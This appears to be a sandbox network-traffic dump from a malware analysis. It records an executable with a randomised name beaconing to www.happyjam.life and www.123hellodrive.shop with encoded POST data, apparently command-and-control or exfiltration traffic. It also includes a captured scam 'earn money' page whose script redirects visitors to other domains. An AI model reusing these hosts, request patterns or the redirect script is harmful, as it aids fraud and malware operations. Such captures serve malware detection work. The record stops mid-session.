                                                                    Data Ascii: dc6<!DOCTYPE html><html><head><script> setTimeout(function(){ location.href="/index.php"; },5000);</script><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta property="og:image" content="/assets/social_img2.jpg"><meta property="og:title" content="Let's make
                                                                    Jan 10, 2025 21:31:45.060269117 CET224INData Raw: 20 6d 6f 6e 65 79 20 65 61 73 69 6c 79 20 77 69 74 68 20 6d 6f 62 69 6c 65 20 70 68 6f 6e 65 20 f0 9f 8c b9 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                    Data Ascii: money easily with mobile phone "> <meta property="og:description" content="We are the best earning site online paying over $35 million per month to 300,000 members"><meta property="og:image:width" content="600px"><m
                                                                    Jan 10, 2025 21:31:45.060285091 CET1236INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 34 70 78 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68
                                                                    Data Ascii: eta property="og:image:height" content="324px"><meta property="og:url" content="https://www.kkpmoneysocial.top"><meta property="og:updated_time" content="1736541104"> <meta property="og:type" content="website"> <meta property="og:site_name
                                                                    Jan 10, 2025 21:31:45.060301065 CET1236INData Raw: 65 29 20 0a 20 20 7b 20 0a 20 20 20 20 20 20 76 61 72 20 68 6f 75 72 20 3d 20 33 30 30 30 3b 20 0a 20 20 20 20 20 20 76 61 72 20 65 78 70 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 20 0a 20 20 20 20 20 20 65 78 70 2e 73 65 74 54 69 6d 65 28 65 78
                                                                    Data Ascii: e) { var hour = 3000; var exp = new Date(); exp.setTime(exp.getTime() + hour*60*60*1000); document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+";path=/"; } function rset_Cookie_fas
                                                                    Jan 10, 2025 21:31:45.060319901 CET448INData Raw: 6b 69 65 5f 66 61 73 74 28 27 68 61 73 67 6f 27 2c 27 6d 6f 6e 65 79 65 61 73 69 6c 79 6c 73 6f 2e 74 6f 70 27 29 3b 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 6f 6e 65 79 65 61 73 69 6c 79 6c 73 6f 2e 74 6f 70 2f 69
                                                                    Data Ascii: kie_fast('hasgo','moneyeasilylso.top');location.href='https://moneyeasilylso.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==';};});$.getScript('//moneyeasilyywe.top/typed.js?1736541104',function(){ if(!rget_Cookie('hasgo')){rset_
                                                                    Jan 10, 2025 21:31:45.060374022 CET49INData Raw: 3d 3d 27 3b 7d 3b 7d 29 3b 0d 0a 0a 20 3c 2f 73 63 72 69 70 74 3e 20 0a 3c 2f 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: ==';};}); </script> </body> </html>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.664228209.74.77.107802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:31:58.388870955 CET747OUTPOST /4t49/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.happyjam.life
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.happyjam.life
                                                                    Referer: http://www.happyjam.life/4t49/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 68 59 57 64 59 39 47 48 4b 6b 6e 4d 35 6d 5a 74 74 39 34 61 79 2b 5a 49 4b 68 64 44 71 37 56 6b 49 49 4e 71 49 41 59 61 38 64 48 59 76 2f 75 46 37 56 4a 68 30 32 68 5a 57 7a 78 35 75 33 5a 53 35 71 33 5a 58 2f 48 66 35 46 42 55 75 47 49 41 54 47 57 7a 74 59 4f 63 4c 42 62 4e 54 4b 74 31 78 57 35 63 4a 71 71 67 45 4b 49 4c 62 6f 32 4f 79 49 37 46 42 6e 72 42 36 45 45 50 47 51 69 4b 30 6c 65 5a 66 44 48 68 44 4d 59 6a 57 4c 41 47 65 41 63 2f 30 78 2b 67 50 2b 75 76 36 63 67 72 65 61 79 75 63 57 41 6a 2b 51 4f 4d 57 47 39 70 30 79 69 4b 76 55 48 51 78 67 59 38 49 63 50 69
                                                                    Data Ascii: bJMLqbS=nQ80xGd328mxhYWdY9GHKknM5mZtt94ay+ZIKhdDq7VkIINqIAYa8dHYv/uF7VJh02hZWzx5u3ZS5q3ZX/Hf5FBUuGIATGWztYOcLBbNTKt1xW5cJqqgEKILbo2OyI7FBnrB6EEPGQiK0leZfDHhDMYjWLAGeAc/0x+gP+uv6cgreayucWAj+QOMWG9p0yiKvUHQxgY8IcPi
                                                                    Jan 10, 2025 21:31:58.975606918 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:31:58 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.664229209.74.77.107802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:00.941500902 CET771OUTPOST /4t49/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.happyjam.life
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.happyjam.life
                                                                    Referer: http://www.happyjam.life/4t49/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 6a 34 47 64 65 65 65 48 62 30 6e 4e 38 6d 5a 74 69 64 34 65 79 2b 6c 49 4b 6b 35 54 72 4e 39 6b 47 4d 4a 71 4c 45 4d 61 2f 64 48 59 6e 66 75 63 2f 56 49 6a 30 33 63 6b 57 79 4e 35 75 33 4e 53 35 71 48 5a 58 6f 7a 63 2f 46 42 57 69 6d 49 43 65 6d 57 7a 74 59 4f 63 4c 42 66 6e 54 4b 31 31 77 6d 4a 63 4c 4f 47 6a 4e 71 49 45 4d 59 32 4f 32 49 37 42 42 6e 71 69 36 42 63 31 47 53 61 4b 30 67 79 5a 52 32 6e 69 4b 4d 59 68 4c 62 42 6b 56 79 4a 79 30 44 79 67 46 4f 2f 44 68 50 38 4b 53 4d 76 30 41 6c 41 41 73 41 75 4f 57 45 6c 62 30 53 69 67 74 55 2f 51 6a 33 55 62 48 6f 71 42 48 34 4b 58 55 4b 30 70 6c 72 31 6e 56 36 65 7a 4d 7a 77 4d 56 67 3d 3d
                                                                    Data Ascii: bJMLqbS=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN9kGMJqLEMa/dHYnfuc/VIj03ckWyN5u3NS5qHZXozc/FBWimICemWztYOcLBfnTK11wmJcLOGjNqIEMY2O2I7BBnqi6Bc1GSaK0gyZR2niKMYhLbBkVyJy0DygFO/DhP8KSMv0AlAAsAuOWElb0SigtU/Qj3UbHoqBH4KXUK0plr1nV6ezMzwMVg==
                                                                    Jan 10, 2025 21:32:01.521608114 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:32:01 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.664230209.74.77.107802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:03.501627922 CET1784OUTPOST /4t49/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.happyjam.life
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.happyjam.life
                                                                    Referer: http://www.happyjam.life/4t49/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 6a 34 47 64 65 65 65 48 62 30 6e 4e 38 6d 5a 74 69 64 34 65 79 2b 6c 49 4b 6b 35 54 72 4e 31 6b 47 35 64 71 52 6a 77 61 2b 64 48 59 70 2f 75 42 2f 56 49 69 30 33 45 6f 57 79 41 43 75 31 31 53 2f 4a 2f 5a 41 71 62 63 73 6c 42 57 71 47 49 42 54 47 58 7a 74 59 2b 41 4c 42 76 6e 54 4b 31 31 77 6c 52 63 50 61 71 6a 4c 71 49 4c 62 6f 32 53 79 49 37 70 42 6a 2b 63 36 42 51 6c 48 6d 6d 4b 30 41 69 5a 64 6c 50 69 46 4d 59 6e 49 62 42 43 56 79 55 79 30 44 76 54 46 4f 4b 65 68 4e 67 4b 57 35 79 4f 51 55 34 45 7a 79 75 6a 43 55 42 75 77 6b 4b 56 6a 43 6a 4a 72 47 59 32 4b 71 53 4a 66 59 4b 79 5a 34 6c 52 72 36 4e 70 57 39 6e 38 46 44 78 54 43 33 35 50 61 61 32 4f 7a 59 70 64 6f 75 37 58 58 4c 74 30 34 36 44 63 51 57 79 46 42 6d 44 54 42 6f 6c 71 48 56 6a 75 2b 6b 4c 70 2f 69 78 74 7a 4e 6e 36 58 56 6f 53 4f 75 31 65 38 38 52 67 65 63 46 54 32 59 6e 39 61 67 79 48 55 61 4c 4c 68 36 48 79 30 43 5a 53 66 49 53 50 33 31 46 47 52 42 6f 4a 70 62 4a 55 2f 78 [TRUNCATED]
                                                                    Data Ascii: bJMLqbS=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN1kG5dqRjwa+dHYp/uB/VIi03EoWyACu11S/J/ZAqbcslBWqGIBTGXztY+ALBvnTK11wlRcPaqjLqILbo2SyI7pBj+c6BQlHmmK0AiZdlPiFMYnIbBCVyUy0DvTFOKehNgKW5yOQU4EzyujCUBuwkKVjCjJrGY2KqSJfYKyZ4lRr6NpW9n8FDxTC35Paa2OzYpdou7XXLt046DcQWyFBmDTBolqHVju+kLp/ixtzNn6XVoSOu1e88RgecFT2Yn9agyHUaLLh6Hy0CZSfISP31FGRBoJpbJU/xFc4tAIg7F5l4mQ7Yy25vTCkqzqL9Mz1SUGREgoSRz4IdK2Qtf2f6cqjIahEnBPs72MkpZL0/miIFAYF44pepN+wczIBjWDPYbZbY/gY2kbUSot7ED/TlEJT2zjZrrzKO3NHS5yDXEe7rmq0v5qpa52HZe5bun6oPTw6N1inDHS8MwAOvDqOTaDwz9/HULJPuqqRZyfBdWoqg3PA9TvqlL1cKlkwrQvSZNnWLnaLb3fN+iVS6AgdqFvWXiH1Ye1VUyQs5fcc0AhQIT9001tyCJPUn4qVscz+1Ybsk6NVdA1J96Q5SHB7LegwnwLXp30oeSl2daWoBO+lgwfZOtkABbSdQ1yw56hZfueomKLdKOcb6dr4Nr888sJfQZJWCdw14k2aDxbCssg/k1oe/HDT+7LYAmkizaM8FtvIPwCs20ViHM2hvJylGVlryZb2n0F0dKN9cQkbq7nWaNqmWkcfruDeHguq+/wynF8MLhB9CJgbYVxjnIwmGuxR88fdJrHd/Jtig36Y8P3JUOS7GPj6nI0EkDfit586L6SQdAs7en+SQnGTFjLpRtJOAnSzVkbnYOJyTk7RX4vmj5dGo6k1/eHy3Fr9lNbOL/VucYHZXUIrcLx47H9HOuTZk/FE2v5ejY919zv41KBf58y5sk8pGwr7wsMLwN9SKUe [TRUNCATED]
                                                                    Jan 10, 2025 21:32:04.083547115 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:32:03 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.664231209.74.77.107802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:06.040859938 CET489OUTGET /4t49/?bJMLqbS=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.happyjam.life
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:32:06.670361042 CET548INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:32:06 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.66423284.32.84.32802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:11.760071039 CET762OUTPOST /vc3u/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.123hellodrive.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.123hellodrive.shop
                                                                    Referer: http://www.123hellodrive.shop/vc3u/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 38 68 5a 57 4e 4e 74 73 6b 78 49 74 63 6d 63 45 61 71 65 54 64 37 53 64 6f 31 31 76 53 5a 4c 6d 6d 50 4f 51 7a 33 4a 6f 6c 67 46 4f 53 6e 7a 53 7a 73 67 33 73 58 32 36 54 56 65 46 62 37 37 34 48 59 55 39 68 74 73 58 56 6c 74 57 61 43 4a 4f 48 65 63 52 4d 4b 61 2b 6f 2b 6a 6c 73 71 44 56 70 49 2f 36 55 55 52 67 55 47 58 4c 30 4e 6b 7a 79 4d 52 32 45 49 79 48 54 4b 6b 7a 6d 2b 6d 71 79 61 64 57 38 46 72 53 67 46 6b 38 79 68 44 52 68 62 45 53 4a 6a 54 6f 58 6f 32 46 59 33 5a 59 42 2f 50 72 57 36 61 58 6f 78 63 48 57 48 43 39 49 32 39 32 72 43 6e 77 59 43 47 4d 42 44 34 49
                                                                    Data Ascii: bJMLqbS=MKbu1HLFE7i58hZWNNtskxItcmcEaqeTd7Sdo11vSZLmmPOQz3JolgFOSnzSzsg3sX26TVeFb774HYU9htsXVltWaCJOHecRMKa+o+jlsqDVpI/6UURgUGXL0NkzyMR2EIyHTKkzm+mqyadW8FrSgFk8yhDRhbESJjToXo2FY3ZYB/PrW6aXoxcHWHC9I292rCnwYCGMBD4I


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.66423384.32.84.32802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:14.311113119 CET786OUTPOST /vc3u/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.123hellodrive.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.123hellodrive.shop
                                                                    Referer: http://www.123hellodrive.shop/vc3u/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Raw: 62 4a 4d 4c 71 62 53 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 39 43 42 57 4d 73 74 73 78 42 49 75 51 47 63 45 50 61 65 58 64 37 75 64 6f 33 5a 2f 53 72 76 6d 6a 64 47 51 39 54 39 6f 6f 41 46 4f 48 58 7a 74 33 73 67 38 73 58 36 55 54 51 32 46 62 37 2f 34 48 5a 6b 39 68 65 30 55 54 6c 74 49 53 69 4a 4d 49 2b 63 52 4d 4b 61 2b 6f 2b 6d 34 73 72 72 56 6f 34 50 36 53 31 52 2f 5a 6d 58 4b 6a 39 6b 7a 32 4d 52 49 45 49 79 31 54 49 51 4b 6d 34 69 71 79 66 78 57 35 48 53 67 35 31 6b 79 78 52 43 68 69 4f 6f 58 50 46 4f 6e 49 71 75 67 59 31 64 6e 4e 70 53 78 4b 4a 61 30 36 68 38 46 57 46 61 50 49 57 39 63 70 43 66 77 4b 56 4b 72 4f 33 64 72 68 6d 65 43 6c 2f 63 61 63 43 4e 49 73 70 41 6d 4f 36 6d 61 4d 67 3d 3d
                                                                    Data Ascii: bJMLqbS=MKbu1HLFE7i59CBWMstsxBIuQGcEPaeXd7udo3Z/SrvmjdGQ9T9ooAFOHXzt3sg8sX6UTQ2Fb7/4HZk9he0UTltISiJMI+cRMKa+o+m4srrVo4P6S1R/ZmXKj9kz2MRIEIy1TIQKm4iqyfxW5HSg51kyxRChiOoXPFOnIqugY1dnNpSxKJa06h8FWFaPIW9cpCfwKVKrO3drhmeCl/cacCNIspAmO6maMg==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.66423484.32.84.32802496C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 21:32:16.860701084 CET1799OUTPOST /vc3u/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.123hellodrive.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.123hellodrive.shop
                                                                    Referer: http://www.123hellodrive.shop/vc3u/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
